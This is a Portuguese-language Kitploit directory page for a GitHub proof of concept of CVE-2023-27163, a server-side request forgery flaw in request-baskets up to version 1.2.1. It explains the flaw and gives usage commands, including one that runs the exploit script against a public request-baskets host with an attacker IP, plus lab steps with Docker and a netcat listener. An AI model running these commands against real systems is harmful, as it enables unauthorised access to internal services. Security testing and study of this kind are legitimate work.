Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-27163 — Prova de Conceito para Server Side Request Forgery (SSRF) no request-baskets (V<= v.1.2.1) | Kitploit
Ferramentas/GitHubGitHub/mastercode112/cve-2023-27163
ReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubmastercode112/cve-2023-27163

CVE-2023-27163

Prova de Conceito para Server Side Request Forgery (SSRF) no request-baskets (V<= v.1.2.1)

Ver Repositório
21há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Prova de Conceito de SSRF no Request-Baskets (CVE-2023-27163)

Este repositório contém uma Prova de Conceito (PoC) para CVE-2023-27163, uma vulnerabilidade de Server-Side Request Forgery (SSRF) descoberta no request-baskets até a versão 1.2.1. Essa vulnerabilidade permite que atacantes acessem recursos de rede e informações sensíveis explorando o componente /api/baskets/{name} através de uma requisição de API manipulada.

Uso

root@kitploit:~
git clone https://github.com/MasterCode112/CVE-2023-27163.git
bash ./CVE-2023-27163.sh https://rbaskets.in/ <IP do atacante>

Como funciona?

Request-baskets é uma aplicação web criada para coletar e registrar requisições em uma rota específica, chamada basket. Ao criá-la, o usuário pode especificar outro servidor para encaminhar a requisição. O problema aqui é que o usuário pode especificar serviços não intencionados, como aplicações fechadas à rede.

Por exemplo: suponha que o servidor hospede o Request-baskets (porta 55555) e um servidor web Flask na porta 8000. O Flask também está configurado para interagir apenas com localhost. Ao criar uma basket que encaminha para http://localhost:8000, o atacante pode acessar o servidor web Flask anteriormente restrito.

Testando no localhost

Imagem da PoC

  1. Inicie o contêiner Docker do Request-Baskets
root@kitploit:~
docker run -p 55555:55555 darklynx/request-baskets:v1.2.1
  1. Baixe a PoC
root@kitploit:~
git clone https://github.com/MasterCode112/CVE-2023-27163.git
  1. Aguarde uma conexão
root@kitploit:~
nc -lvp 8000
  1. Salve o endereço IP do host Docker
root@kitploit:~
DOCKER_IP=$(ifconfig docker0 | grep inet | head -n 1 | awk '{ print $2 }')
  1. Execute a PoC
root@kitploit:~
./CVE-2023-27163.sh http://127.0.0.1:55555/ http://$DOCKER_IP:8000/
Baixar ferramenta